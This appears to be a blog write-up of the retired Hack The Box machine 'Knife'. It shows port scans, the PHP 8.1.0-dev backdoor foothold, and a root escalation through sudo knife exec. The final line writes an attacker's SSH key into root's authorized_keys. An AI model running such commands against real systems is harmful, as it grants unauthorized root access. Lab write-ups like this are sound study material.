On this post
- Information Gathering
- Privilege Escalation
Knife is a retired vulnerable VM from Hack The Box.
Let’s start with a
masscan probe to establish the open ports in the host.
masscan -e tun0 -p1-65535,U:1-65535 10.10.10.242 --rate=500 Starting masscan 1.3.2 (http://bit.ly/14GZzcT) at 2021-05-24 00:49:40 GMT Initiating SYN Stealth Scan Scanning 1 hosts [131070 ports/host] Discovered open port 80/tcp on 10.10.10.242 Discovered open port 22/tcp on 10.10.10.242
Nothing unusual stood out. Let’s do one better with
nmap scanning the discovered ports to establish their services.
nmap -n -v -Pn -p22,80 -A --reason 10.10.10.242 -oN nmap.txt ... PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 be:54:9c:a3:67:c3:15:c3:64:71:7f:6a:53:4a:4c:21 (RSA) | 256 bf:8a:3f:d4:06:e9:2e:87:4e:c9:7e:ab:22:0e:c0:ee (ECDSA) |_ 256 1a:de:a1:cc:37:ce:53:bb:1b:fb:2b:0b:ad:b3:f6:84 (ED25519) 80/tcp open http syn-ack ttl 63 Apache httpd 2.4.41 ((Ubuntu)) | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-server-header: Apache/2.4.41 (Ubuntu) |_http-title: Emergent Medical Idea
Hmm. I guess the path to foothold is through
http service. This is what it looks like.
This is a shit-show man. There is nothing—no hyperlinks—no nothing.
PHP 8.1.0-dev Backdoor Remote Command Execution
It was only when I noticed the PHP version used then I realized I’m looking at a PHP backdoor.
According to this repo,
An early release of PHP, the PHP 8.1.0-dev version was released with a backdoor on March 28th 2021, but the backdoor was quickly discovered and removed. If this version of PHP runs on a server, an attacker can execute arbitrary code by sending the
Armed with this insight, it’s not very difficult to get a proper shell.
user.txt is at
james’ home directory.
During enumeration of
james’ account, I notice that
james is able to
sudo the following commands.
Check this out.
knife execsubcommand to execute Ruby scripts in the context of a fully configured Chef Infra Client. Use this subcommand to run scripts that will only access Chef Infra Server one time (or otherwise very infrequently) or any time that an operation does not warrant full usage of the knife subcommand library.
I’d simply write a SSH public key I control to
/root/.ssh/authorized_keys and call it a day.
sudo knife exec -E 'File.write("/root/.ssh/authorized_keys", "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPEyLBRKTB13FoHcIAf4DKPh9aE8NOsYN+WTXcIreESy\n", mode: "a")'